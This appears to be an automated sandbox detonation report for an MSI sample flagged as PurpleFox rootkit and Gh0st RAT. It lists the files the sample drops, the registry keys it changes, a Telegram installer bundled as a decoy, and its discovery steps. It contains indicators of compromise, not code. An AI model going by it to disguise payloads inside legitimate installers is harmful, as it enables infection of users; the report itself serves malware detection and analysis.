SHA512 17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

memory/2960-193-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/2960-192-0x00000000002B0000-0x00000000002BA000-memory.dmp

memory/2960-198-0x0000000000310000-0x000000000031A000-memory.dmp

memory/2960-199-0x0000000000310000-0x000000000031A000-memory.dmp

memory/2960-213-0x0000000000310000-0x000000000031A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-09 15:17

Reported

2024-11-09 15:20

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

Signatures

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\J: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\W: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\O: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Y: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Q: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\V: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Z: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\X: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\UhHKDmESOIjj.exe.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\Saved Games C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File created C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\System32\MsiExec.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A
File created C:\Program Files\SustainSleekTutor\valibclang2d.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A
File created C:\Program Files\SustainSleekTutor\tsetup.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.wrapper.log C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{E94DD97D-74C5-4066-895C-1E7D5A0698F5} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB99B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57b807.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57b805.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57b805.msi C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\tsetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000038a6760542cf76680000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000038a676050000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090038a67605000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d38a67605000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000038a6760500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 6830eccbd53acba79b3678289e7adb3351caaff0c00b773c3d3ce8e0a6ee35f0 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\NoModify = "1" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop\Capabilities\ApplicationName = "Telegram Desktop" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop\Capabilities\UrlAssociations\tg = "tdesktop.tg" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\tg\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayVersion = "5.2.3" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\InstallLocation = "C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\NoRepair = "1" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TelegramDesktop\Capabilities C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\System32\WScript.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\HelpLink = "https://desktop.telegram.org" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\MinorVersion = "2" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Setup Version = "6.2.2" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\RegFilesHash = 61d04e6bf84ec24f19c1f205f15fd6c7cc1e20c01e3bba5e1632aff982bcdb60 C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Icon Group = "Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: No Icons = "1" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayName = "Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-Q4NJ6.tmp\tsetup.tmp N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Language = "1033" C:\Windows\system32\msiexec.exe N/A
